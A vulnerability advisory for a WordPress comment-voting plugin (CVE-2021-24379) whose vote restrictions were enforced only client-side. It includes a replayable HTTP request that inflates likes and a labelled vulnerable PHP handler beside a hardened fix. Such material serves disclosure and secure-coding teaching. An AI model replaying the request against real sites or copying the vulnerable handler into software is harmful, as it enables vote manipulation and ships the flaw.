
WordPress Plugin Vulnerabilities

Comments Like Dislike < 1.1.4 - Add Like/Dislike Bypass

Description

The plugin allows users to like/dislike posted comments, but does not prevent them from replaying the AJAX request that adds a like. This allows any user (even unauthenticated) to add unlimited likes/dislikes to any comment. The plugin offers several restriction modes (Cookie Restriction, IP Restriction, Logged In User Restriction), but they do not prevent such an attack because they are only checked on the client side.

v1.1.3 fixed the issue for the Logged In User Restriction mode, but not the others. v1.1.4 fixed it for the remaining affected modes.

Proof of Concept

Capture the request made when adding a like to a comment, and replay the request.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

comment_id=6&action=cld_comment_ajax_action&type=like&_wpnonce=a772faf68b
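The description above says the restriction modes were enforced only in the browser, so the server-side AJAX handler counted every request it received. The following is an added example, not the Comments Like Dislike plugin's own code: a WordPress AJAX vote handler in the vulnerable shape the advisory describes, beside a hardened version that enforces the "Logged In User" restriction on the server and records each user's vote so a replayed request is rejected. The action name example_comment_vote, the comment meta keys and the function names are assumptions made for this illustration.

```php
<?php
/*
 * Added example (not the plugin's own code). Action name, meta keys and
 * function names are assumed for illustration.
 */

// --- Vulnerable pattern: the server trusts that the client only sent the
// request once. Replaying the same POST increments the counter without limit,
// whatever the JavaScript on the page was told to restrict.
function example_vote_vulnerable() {
    $comment_id = absint( $_POST['comment_id'] ?? 0 );
    $type       = ( $_POST['type'] ?? '' ) === 'dislike' ? 'dislike' : 'like';

    $count = (int) get_comment_meta( $comment_id, "_example_{$type}_count", true );
    update_comment_meta( $comment_id, "_example_{$type}_count", $count + 1 );

    wp_send_json_success( array( 'count' => $count + 1 ) );
}

// --- Hardened pattern: nonce check, authentication required, and one vote per
// user per comment recorded server-side, so a replayed request is refused.
function example_vote_hardened() {
    // Refuse requests that do not carry a valid nonce for this action
    // (check_ajax_referer() terminates the request on failure).
    check_ajax_referer( 'example_comment_vote', '_wpnonce' );

    // "Logged In User Restriction" has to be enforced here, not in JavaScript.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'Login required to vote.' ), 403 );
    }

    $comment_id = absint( $_POST['comment_id'] ?? 0 );
    $type       = ( $_POST['type'] ?? '' ) === 'dislike' ? 'dislike' : 'like';
    $user_id    = get_current_user_id();

    if ( ! get_comment( $comment_id ) ) {
        wp_send_json_error( array( 'message' => 'Unknown comment.' ), 404 );
    }

    // Server-side record of who already voted on this comment, stored as
    // user_id => vote type in comment meta (assumed key "_example_voters").
    $voters = get_comment_meta( $comment_id, '_example_voters', true );
    if ( ! is_array( $voters ) ) {
        $voters = array();
    }

    if ( isset( $voters[ $user_id ] ) ) {
        // Replayed or repeated request: the vote already exists, do not count it again.
        wp_send_json_error( array( 'message' => 'You have already voted on this comment.' ), 409 );
    }

    $voters[ $user_id ] = $type;
    update_comment_meta( $comment_id, '_example_voters', $voters );

    // Derive the counts from the voter record rather than keeping a separate
    // counter, so a total can never exceed the number of distinct voters.
    $likes    = count( array_keys( $voters, 'like', true ) );
    $dislikes = count( array_keys( $voters, 'dislike', true ) );

    wp_send_json_success( array( 'like' => $likes, 'dislike' => $dislikes ) );
}

// Register only the hardened handler, and only on the authenticated hook
// (no wp_ajax_nopriv_ registration), so unauthenticated POSTs never reach it.
add_action( 'wp_ajax_example_comment_vote', 'example_vote_hardened' );

// The front end obtains its nonce from wp_create_nonce( 'example_comment_vote' ),
// typically passed to the script with wp_localize_script().
```

Note that the _wpnonce value in the captured request is not what stops the replay: a WordPress nonce is reusable until it expires, so the replayed request carries a perfectly valid one. The per-user vote record in comment meta is the control that makes the second request fail. The Cookie and IP restriction modes need the same treatment on the server, keyed by the cookie value or client address instead of the user ID, with the caveat that those keys are under the client's control and therefore weaker than an authenticated user ID.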

Affects Plugins

comments-like-dislike
Fixed in version 1.1.4

References

CVE
CVE-2021-24379

Classification

Type

BYPASS

Miscellaneous

Original Researcher

Phu Tran from techlabcorp.com

Submitter

Phu Tran

Verified

Yes

WPVDB ID
aae7a889-195c-45a3-bbe4-e6d4cd2d7fd9

Timeline

Publicly Published

2021-06-07

Added

2021-06-07

Last Updated

2021-08-10
